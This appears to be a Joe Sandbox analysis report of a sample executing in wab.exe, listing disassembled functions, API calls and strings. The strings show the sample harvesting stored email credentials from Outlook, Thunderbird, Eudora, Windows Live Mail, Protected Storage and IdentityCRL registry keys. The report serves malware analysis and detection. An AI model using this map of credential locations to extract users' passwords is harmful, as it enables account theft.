33207->33208 33208->33205 33210 44b413 33209->33210 33212 44b454 33210->33212 33216 44b42b 33210->33216 33213 44b41c 33213->33212 33214 44b435 VirtualProtect 33213->33214 33214->33212 33215 44b444 VirtualProtect 33214->33215 33215->33212 33217 44b431 33216->33217 33218 44b435 VirtualProtect 33217->33218 33220 44b454 33217->33220 33219 44b444 VirtualProtect 33218->33219 33218->33220 33219->33220 34423 43ffc8 18 API calls 34236 4281cc 15 API calls 34425 4383cc 110 API calls 34237 4275d3 41 API calls 34426 4153d3 22 API calls 34238 444dd7 _XcptFilter 34431 4013de 15 API calls 34433 425115 111 API calls 34434 43f7db 18 API calls 34437 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34240 4335ee 16 API calls 34439 429fef 11 API calls 34241 444deb _exit _c_exit 34440 40bbf0 138 API calls 34244 425115 79 API calls 34444 437ffa 22 API calls 34248 4021ff 14 API calls 34249 43f5fc 149 API calls 34445 40e381 9 API calls 34251 405983 40 API calls 34252 42b186 27 API calls 34253 427d86 76 API calls 34254 403585 20 API calls 34256 42e58e 18 API calls 34259 425115 75 API calls 34261 401592 8 API calls 33188 410b92 33191 410a6b 33188->33191 33190 410bb2 33192 410a77 33191->33192 33193 410a89 GetPrivateProfileIntA 33191->33193 33196 410983 memset _itoa WritePrivateProfileStringA 33192->33196 33193->33190 33195 410a84 33195->33190 33196->33195 34449 434395 16 API calls 34263 441d9c memcmp 34451 43f79b 119 API calls 34264 40c599 43 API calls 34452 426741 87 API calls 34268 4401a6 21 API calls 34270 426da6 memcpy memset memset memcpy 34271 4335a5 15 API calls 34273 4299ab memset memset memcpy memset memset 34274 40b1ab 8 API calls 34457 425115 76 API calls 34461 4113b2 18 API calls 34465 40a3b8 memset sprintf SendMessageA 33221 410bbc 33224 4109cf 33221->33224 33225 4109dc 33224->33225 33226 410a23 memset GetPrivateProfileStringA 33225->33226 33227 4109ea memset 33225->33227 33232 407646 strlen 33226->33232 33237 4075cd sprintf memcpy 33227->33237 33230 410a0c WritePrivateProfileStringA 33231 410a65 33230->33231 33233 40765a 33232->33233 33235 40765c 33232->33235 33233->33231 33234 4076a3 33234->33231 33235->33234 33238 40737c strtoul 33235->33238 33237->33230 33238->33235 34276 40b5bf memset memset _mbsicmp

                                                  Executed Functions

                                                  Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                  APIs
                                                  • memset.MSVCRT ref: 0040832F
                                                  • memset.MSVCRT ref: 00408343
                                                  • memset.MSVCRT ref: 0040835F
                                                  • memset.MSVCRT ref: 00408376
                                                  • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                  • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                  • strlen.MSVCRT ref: 004083E9
                                                  • strlen.MSVCRT ref: 004083F8
                                                  • memcpy.MSVCRT ref: 0040840A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                  • String ID: 5$H$O$b$i$}$}
                                                  • API String ID: 1832431107-3760989150
                                                  • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                  • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                  • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                  • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                  Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 450 407f89-407f8f 446->450 451 407f83 447->451 452 407f76-407f81 call 4070e3 447->452 448->446 454 407f86-407f88 451->454 452->454 454->450
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                  • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                  • strlen.MSVCRT ref: 00407F5C
                                                  • strlen.MSVCRT ref: 00407F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileFindstrlen$FirstNext
                                                  • String ID: ACD
                                                  • API String ID: 379999529-620537770
                                                  • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                  • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                  • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                  • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                  Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 00401E8B
                                                  • strlen.MSVCRT ref: 00401EA4
                                                  • strlen.MSVCRT ref: 00401EB2
                                                  • strlen.MSVCRT ref: 00401EF8
                                                  • strlen.MSVCRT ref: 00401F06
                                                  • memset.MSVCRT ref: 00401FB1
                                                  • atoi.MSVCRT ref: 00401FE0
                                                  • memset.MSVCRT ref: 00402003
                                                  • sprintf.MSVCRT ref: 00402030
                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                  • memset.MSVCRT ref: 00402086
                                                  • memset.MSVCRT ref: 0040209B
                                                  • strlen.MSVCRT ref: 004020A1
                                                  • strlen.MSVCRT ref: 004020AF
                                                  • strlen.MSVCRT ref: 004020E2
                                                  • strlen.MSVCRT ref: 004020F0
                                                  • memset.MSVCRT ref: 00402018
                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                  • _mbscpy.MSVCRT ref: 00402177
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                  • API String ID: 1846531875-4223776976
                                                  • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                  • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                  • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                  • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                  Function 0040CF44 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                    • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                    • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                    • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                  • DeleteObject.GDI32(?), ref: 0040D1A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                  • API String ID: 745651260-375988210
                                                  • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                  • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                  • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                  • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                  Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                  • _mbscpy.MSVCRT ref: 00403E54
                                                  Strings
                                                  • pstorec.dll, xrefs: 00403C30
                                                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                  • PStoreCreateInstance, xrefs: 00403C44
                                                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc_mbscpy
                                                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                  • API String ID: 1197458902-317895162
                                                  • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                  • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                  • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                  • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                  Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  • memcpy.MSVCRT ref: 0040FBE4
                                                  • memcpy.MSVCRT ref: 0040FBF9
                                                    • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                    • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                    • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                    • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                  • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                  • API String ID: 2768085393-2409096184
                                                  • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                  • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                  • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                  • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                                  Function 00444C4A Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 254 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->254 253->252 255 444c75-444c7e 253->255 264 444d02-444d0d __setusermatherr 254->264 265 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 254->265 256 444c80-444c85 255->256 257 444c9f-444ca3 255->257 256->252 259 444c8c-444c93 256->259 257->252 260 444ca5-444ca7 257->260 259->252 262 444c95-444c9d 259->262 263 444cad-444cb0 260->263 262->263 263->254 264->265 268 444da4-444da7 265->268 269 444d6a-444d72 265->269 270 444d81-444d85 268->270 271 444da9-444dad 268->271 272 444d74-444d76 269->272 273 444d78-444d7b 269->273 275 444d87-444d89 270->275 276 444d8b-444d9c GetStartupInfoA 270->276 271->268 272->269 272->273 273->270 274 444d7d-444d7e 273->274 274->270 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                  • String ID:
                                                  • API String ID: 3662548030-0
                                                  • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                  • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                  • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                  • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                  Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 0044430B
                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                    • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                    • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                    • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                    • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                  • memset.MSVCRT ref: 00444379
                                                  • memset.MSVCRT ref: 00444394
                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                  • strlen.MSVCRT ref: 004443DB
                                                  • _strcmpi.MSVCRT ref: 00444401
                                                  Strings
                                                  • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                  • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                  • Store Root, xrefs: 004443A5
                                                  • \Microsoft\Windows Mail, xrefs: 00444329
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                  • API String ID: 832325562-2578778931
                                                  • Opcode ID: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                  • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                  • Opcode Fuzzy Hash: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                  • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                  Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                  APIs
                                                  • memset.MSVCRT ref: 0040F567
                                                  • memset.MSVCRT ref: 0040F57F
                                                    • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  • memcpy.MSVCRT ref: 0040F652
                                                  • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                  • String ID:
                                                  • API String ID: 2012582556-3916222277
                                                  • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                  • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                  • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                  • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                  Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                                  APIs
                                                  • memset.MSVCRT ref: 004037EB
                                                  • memset.MSVCRT ref: 004037FF
                                                    • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                    • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                  • strchr.MSVCRT ref: 0040386E
                                                  • _mbscpy.MSVCRT ref: 0040388B
                                                  • strlen.MSVCRT ref: 00403897
                                                  • sprintf.MSVCRT ref: 004038B7
                                                  • _mbscpy.MSVCRT ref: 004038CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                  • String ID: %s@yahoo.com
                                                  • API String ID: 317221925-3288273942
                                                  • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                  • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                  • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                  • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                  Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 361 404af5-404afa 356->361 362 404adb 357->362 358->356 359 404ae8-404aea 358->359 359->361 363 404b13-404b17 361->363 364 404afc-404b12 MessageBoxA 361->364 362->358
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                  • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                  • API String ID: 2780580303-317687271
                                                  • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                  • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                  • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                  • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                  Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                                  APIs
                                                  • memset.MSVCRT ref: 00403504
                                                  • memset.MSVCRT ref: 0040351A
                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                  • _mbscpy.MSVCRT ref: 00403555
                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                  • _mbscat.MSVCRT ref: 0040356D
